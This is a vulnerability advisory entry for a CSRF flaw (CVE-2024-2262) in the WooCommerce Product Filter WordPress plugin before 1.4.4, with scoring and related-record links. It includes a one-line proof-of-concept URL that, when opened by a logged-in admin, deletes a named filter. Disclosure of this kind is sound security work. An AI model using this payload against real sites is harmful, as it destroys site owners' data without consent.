Lucene search
Erwan LR (WPScan)WPVDB-ID:30544377-B90D-4762-B38A-EC89BDA0DFDCHistoryMar 11, 2024 - 12:00 a.m.
WooCommerce Product Filter < 1.4.4 - Filter Deletion via CSRF
2024-03-1100:00:00
Erwan LR (WPScan)
wpscan.com
6
woocommerce product filter
csrf
filter deletion
security vulnerability
bulk action
cross-site request forgery
admin account
attack vector
Description The plugin does not have CSRF check in its bulk action, which could allow attackers to make logged in users delete arbitrary filters via CSRF attack, granted they know the related filter slugs
PoC
Make a logged in admin open the URL below to make them delete the filter with the slug test1: https://example.com/wp-admin/admin.php?page=wpf_search&action;=delete&paged;=1&wpf;_post[]=test1&action2;=delete
| CPE | Name | Operator | Version |
|---|---|---|---|
| eq | 1.4.4 |
Related
nvd
nvd
CVE-2024-2262
2024-04-01 05:15:07
cvelist
cvelist
CVE-2024-2262 WooCommerce Product Filter < 1.4.4 - Filter Deletion via CSRF
2024-04-01 05:00:01
wpexploit
wpexploit
WooCommerce Product Filter < 1.4.4 - Filter Deletion via CSRF
2024-03-11 00:00:00
cve
cve
CVE-2024-2262
2024-04-01 05:15:07
6.6 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.1%
Related for WPVDB-ID:30544377-B90D-4762-B38A-EC89BDA0DFDC